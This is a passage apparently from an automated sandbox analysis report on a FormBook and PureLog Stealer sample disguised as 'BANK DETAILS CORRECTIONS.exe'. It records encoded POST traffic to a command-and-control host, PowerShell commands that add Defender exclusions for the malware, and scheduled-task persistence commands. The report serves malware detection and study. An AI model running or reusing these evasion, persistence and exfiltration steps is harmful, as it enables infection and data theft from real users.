                                                                                  Data Ascii: lt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem
                                                                                  Mar 18, 2024 14:49:23.299875975 CET201INData Raw: 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 77 72 61 70 70 65 72 22 3e 3c 64 69
                                                                                  Data Ascii: w noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.1049765208.91.197.132806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:38.816864014 CET760OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.roblesprats.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.roblesprats.com
                                                                                  Referer: http://www.roblesprats.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 44 79 76 2b 38 4d 6b 2b 57 65 38 68 53 50 36 73 53 65 50 63 6a 43 34 32 67 4a 30 6d 73 45 48 2f 71 7a 65 4c 53 76 2b 78 76 78 34 52 57 4c 44 37 54 30 6c 67 4c 67 49 39 6a 63 6b 35 32 35 30 33 51 6c 63 6b 41 44 4b 4d 72 61 53 4f 66 6d 63 36 74 44 57 33 6e 70 78 2f 46 33 32 2f 79 4f 42 53 73 72 76 58 6c 68 41 30 76 6c 6c 56 31 32 64 41 46 62 73 36 46 36 6f 36 33 73 6f 64 6f 33 6d 55 6c 71 4a 43 5a 2f 7a 2f 4f 6a 65 69 78 67 63 56 31 51 5a 50 65 4e 71 2b 4d 54 32 56 72 53 57 4d 6a 73 4d 45 74 38 62 49 5a 66 58 48 32 6f 73 58 58 6f 50 41 6a 53 50 2f 46 4d 6f 6e
                                                                                  Data Ascii: bvOt=Dyv+8Mk+We8hSP6sSePcjC42gJ0msEH/qzeLSv+xvx4RWLD7T0lgLgI9jck52503QlckADKMraSOfmc6tDW3npx/F32/yOBSsrvXlhA0vllV12dAFbs6F6o63sodo3mUlqJCZ/z/OjeixgcV1QZPeNq+MT2VrSWMjsMEt8bIZfXH2osXXoPAjSP/FMon


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.1049766208.91.197.132806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:41.430145025 CET784OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.roblesprats.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.roblesprats.com
                                                                                  Referer: http://www.roblesprats.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 44 79 76 2b 38 4d 6b 2b 57 65 38 68 54 76 4b 73 65 5a 37 63 68 69 34 31 35 35 30 6d 35 30 48 37 71 7a 53 4c 53 72 47 62 75 44 4d 52 56 76 50 37 51 78 52 67 49 67 49 39 78 38 6b 67 37 5a 30 38 51 6c 42 48 41 42 65 4d 72 61 75 4f 66 6a 34 36 74 52 2b 34 6d 35 78 39 4a 58 32 48 38 75 42 53 73 72 76 58 6c 67 6c 62 76 6b 42 56 30 46 46 41 47 36 73 31 44 4b 6f 39 68 38 6f 64 73 33 6d 59 6c 71 4a 73 5a 2b 65 6b 4f 67 32 69 78 6c 67 56 32 42 5a 4d 51 4e 71 34 44 7a 33 67 39 58 2f 2b 6a 50 38 63 6e 2b 4f 46 47 76 50 75 34 70 4e 51 47 35 75 58 77 6c 54 78 4c 4b 64 4e 4b 36 72 47 5a 63 53 6f 46 44 68 33 54 32 2b 47 61 57 4e 58 61 77 3d 3d
                                                                                  Data Ascii: bvOt=Dyv+8Mk+We8hTvKseZ7chi41550m50H7qzSLSrGbuDMRVvP7QxRgIgI9x8kg7Z08QlBHABeMrauOfj46tR+4m5x9JX2H8uBSsrvXlglbvkBV0FFAG6s1DKo9h8ods3mYlqJsZ+ekOg2ixlgV2BZMQNq4Dz3g9X/+jP8cn+OFGvPu4pNQG5uXwlTxLKdNK6rGZcSoFDh3T2+GaWNXaw==


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  51192.168.2.1049767208.91.197.13280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:44.682219982 CET1797OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.roblesprats.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.roblesprats.com
                                                                                  Referer: http://www.roblesprats.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 44 79 76 2b 38 4d 6b 2b 57 65 38 68 54 76 4b 73 65 5a 37 63 68 69 34 31 35 35 30 6d 35 30 48 37 71 7a 53 4c 53 72 47 62 75 44 55 52 56 61 54 37 54 57 39 67 4a 67 49 39 71 38 6b 39 37 5a 30 68 51 6c 59 4f 41 42 43 32 72 63 69 4f 4f 78 77 36 35 77 2b 34 76 35 78 39 55 6e 32 38 79 4f 42 48 73 76 4b 65 6c 67 31 62 76 6b 42 56 30 44 70 41 53 37 73 31 42 4b 6f 36 33 73 6f 52 6f 33 6e 50 6c 72 68 61 5a 2b 72 52 4a 52 57 69 79 45 51 56 7a 33 31 4d 59 4e 71 36 41 7a 33 34 39 58 37 6c 6a 4f 51 36 6e 2f 4c 6f 47 73 76 75 34 64 63 4b 44 62 36 77 75 30 6a 38 4d 5a 52 4a 50 4b 7a 37 52 2b 7a 39 4a 54 4d 71 51 6d 7a 75 55 6b 6b 31 43 37 56 4d 67 39 50 36 4b 61 69 41 62 7a 35 67 43 4d 4e 5a 57 79 55 58 44 75 4b 4a 38 64 67 67 76 74 46 62 50 38 53 66 62 6b 31 4b 6b 4f 67 49 36 49 68 63 38 79 55 45 31 41 4f 7a 45 41 73 4c 72 4a 69 41 78 6a 52 4e 67 76 46 69 78 49 7a 4b 7a 36 4c 2b 55 73 77 4c 32 6c 6f 6e 7a 31 36 33 6c 41 43 4f 58 4f 55 74 4c 30 46 50 34 47 67 66 57 56 4c 30 5a 53 34 61 73 46 79 42 32 43 67 4a 6d 4c 32 4a 62 6c 4d 6b 38 6e 6f 32 63 4e 74 51 42 5a 7a 6f 64 53 52 69 36 4c 36 51 31 57 70 35 35 50 67 36 74 52 67 55 66 5a 68 77 49 30 35 49 62 46 75 79 30 79 71 66 4a 30 4a 7a 55 6d 53 35 6f 31 43 6a 37 4d 2f 67 45 4a 4d 35 45 55 42 6b 6e 33 41 41 34 58 4d 42 5a 52 32 4a 33 37 52 49 73 69 4d 6c 78 33 37 7a 65 48 32 7a 61 46 71 69 4a 58 39 42 53 38 46 31 36 2f 71 44 69 53 43 30 4e 61 66 4b 70 59 6a 43 70 73 66 37 6f 69 4a 30 38 39 66 65 61 4e 6a 45 70 30 67 2b 66 79 48 56 63 75 46 47 75 4a 4c 6a 42 31 67 7a 58 57 4b 2b 33 65 74 34 63 35 36 6c 2f 41 36 72 47 62 31 72 50 51 4c 57 77 4a 6e 7a 63 58 6a 47 4d 5a 77 4b 43 52 6c 75 46 48 46 65 7a 69 2b 57 45 65 64 42 4b 63 39 74 33 72 38 31 42 62 46 39 6d 59 48 4d 53 70 79 64 68 79 5a 66 6e 37 73 6d 64 57 61 6b 56 4b 37 57 2f 66 59 32 5a 6c 74 76 4c 42 34 6c 33 59 4b 7a 62 39 2b 71 38 37 6a 65 64 52 42 75 64 32 59 72 2f 35 4f 37 37 70 52 32 72 46 56 30 71 7a 47 6d 78 70 41 35 6d 76 54 73 4f 54 37 71 6f 35 54 6e 37 4a 46 56 75 6d 6d 41 42 54 36 4c 48 30 6b 6a 31 6b 47 6a 4d 52 6f 46 38 44 6f 56 35 2f 79 39 4a 56 2b 57 6b 41 34 5a 4b 30 69 36 2f 58 69 4e 31 62 45 6e 55 36 73 35 52 46 68 6c 46 76 66 52 56 4b 50 2b 31 7a 47 51 64 52 6b 57 7a 2b 58 62 73 42 67 48 57 4a 31 79 4f 6d 47 46 4b 72 32 39 46 4d 37 74 59 30 46 61 77 49 4a 59 42 34 76 4e 63 66 46 37 57 47 53 6d 56 37 65 68 76 70 66 6e 36 6d 6a 51 70 6b 67 77 59 2f 48 38 41 62 57 64 72 49 70 64 51 7a 68 61 62 4d 4a 30 58 36 59 34 61 43 42 42 54 4a 61 76 55 34 59 46 5a 52 35 68 42 7a 4b 55 6b 46 41 46 6a 4c 30 45 4a 78 6f 43 48 48 68 51 46 56 77 4b 59 53 45 6f 6e 44 32 68 4c 68 66 53 78 41 76 4d 35 6c 34 41 5a 32 4e 33 71 33 77 64 33 50 71 73 79 73 69 62 49 62 6c 46 72 44 6e 30 44 44 41 4e 65 6a 57 43 76 54 45 66 46 4e 61 55 68 32 6a 74 4a 68 43 6f 4c 52 41 69 61 75 6a 71 55 46 71 52 43 6e 77 2f 65 68 2f 61 43 70 4c 51 77 6f 43 4a 4c 61 74 61 72 46 37 38 41 35 6b 70 50 46 6e 70 6e 42 37 38 4b 35 64 50 6d 46 50 41 77 44 4e 45 42 49 30 30 34 2b 6f 79 54 6f 71 33 53 4d 55 4b 6b 51 43 50 6e 64 4b 42 32 45 50 37 75 4e 4a 51 4c 6d 31 6b 2b 4b 45 39 4a 57 31 79 4a 47 35 72 59 35 6e 70 46 58 64 6a 4b 66 44 6a 65 49 45 44 67 5a 6b 38 78 70 36 76 2f 63 38 6d 67 71 68 62 2f 2f 46 41 6d 38 54 4b 74 5a 42 33 48 4c 7a 4d 61 4c 7a 62 37 37 31 42 5a 62 56 78 66 6a 42 5a 7a 4b 59 41 4e 6c 63 42 56 4a 57 33 61 59 77 66 75 30 4b 64 74 35 67 31 62 68 2f 6e 41 67 68 79 68 37 4a 73 73 6a 58 45 68 6f 39 52 34 44 65 6c 75 72 6b 67 36 67 36 49 41 6f 59 54 58 72 4a 64 6d 50 36 63 62 35 7a 67 34 74 4c 76 30 4a 67 6b 6b 4f 6d 6b 66 59 53 44 6f 4b 74 65 51 74 66 69 2f 63 58 74 64 58 52 55 4f 4c 62 41 77 69 76 50 64 4d 71 6c 53 32 52 70 50 66 38 3d
                                                                                  Data Ascii: bvOt=Dyv+8Mk+We8hTvKseZ7chi41550m50H7qzSLSrGbuDURVaT7TW9gJgI9q8k97Z0hQlYOABC2rciOOxw65w+4v5x9Un28yOBHsvKelg1bvkBV0DpAS7s1BKo63soRo3nPlrhaZ+rRJRWiyEQVz31MYNq6Az349X7ljOQ6n/LoGsvu4dcKDb6wu0j8MZRJPKz7R+z9JTMqQmzuUkk1C7VMg9P6KaiAbz5gCMNZWyUXDuKJ8dggvtFbP8Sfbk1KkOgI6Ihc8yUE1AOzEAsLrJiAxjRNgvFixIzKz6L+UswL2lonz163lACOXOUtL0FP4GgfWVL0ZS4asFyB2CgJmL2JblMk8no2cNtQBZzodSRi6L6Q1Wp55Pg6tRgUfZhwI05IbFuy0yqfJ0JzUmS5o1Cj7M/gEJM5EUBkn3AA4XMBZR2J37RIsiMlx37zeH2zaFqiJX9BS8F16/qDiSC0NafKpYjCpsf7oiJ089feaNjEp0g+fyHVcuFGuJLjB1gzXWK+3et4c56l/A6rGb1rPQLWwJnzcXjGMZwKCRluFHFezi+WEedBKc9t3r81BbF9mYHMSpydhyZfn7smdWakVK7W/fY2ZltvLB4l3YKzb9+q87jedRBud2Yr/5O77pR2rFV0qzGmxpA5mvTsOT7qo5Tn7JFVummABT6LH0kj1kGjMRoF8DoV5/y9JV+WkA4ZK0i6/XiN1bEnU6s5RFhlFvfRVKP+1zGQdRkWz+XbsBgHWJ1yOmGFKr29FM7tY0FawIJYB4vNcfF7WGSmV7ehvpfn6mjQpkgwY/H8AbWdrIpdQzhabMJ0X6Y4aCBBTJavU4YFZR5hBzKUkFAFjL0EJxoCHHhQFVwKYSEonD2hLhfSxAvM5l4AZ2N3q3wd3PqsysibIblFrDn0DDANejWCvTEfFNaUh2jtJhCoLRAiaujqUFqRCnw/eh/aCpLQwoCJLatarF78A5kpPFnpnB78K5dPmFPAwDNEBI004+oyToq3SMUKkQCPndKB2EP7uNJQLm1k+KE9JW1yJG5rY5npFXdjKfDjeIEDgZk8xp6v/c8mgqhb//FAm8TKtZB3HLzMaLzb771BZbVxfjBZzKYANlcBVJW3aYwfu0Kdt5g1bh/nAghyh7JssjXEho9R4Delurkg6g6IAoYTXrJdmP6cb5zg4tLv0JgkkOmkfYSDoKteQtfi/cXtdXRUOLbAwivPdMqlS2RpPf8=


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:14:45:32
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Imagebase:0x940000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Imagebase:0xbc0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Imagebase:0xbc0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                                                                                  Imagebase:0x300000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:14:45:35
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Imagebase:0xf00000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:14:45:36
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Imagebase:0x3c0000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1361939859.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 71%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:14:45:37
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff6616b0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:17
                                                                                  Start time:14:45:40
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:14:45:41
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp
                                                                                  Imagebase:0x300000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:19
                                                                                  Start time:14:45:41
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:14:45:41
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Imagebase:0x960000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:21
                                                                                  Start time:14:45:42
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Imagebase:0x310000
                                                                                  File size:31'744 bytes
                                                                                  MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:22
                                                                                  Start time:14:45:46
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:24
                                                                                  Start time:14:45:52
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\sdiagnhost.exe
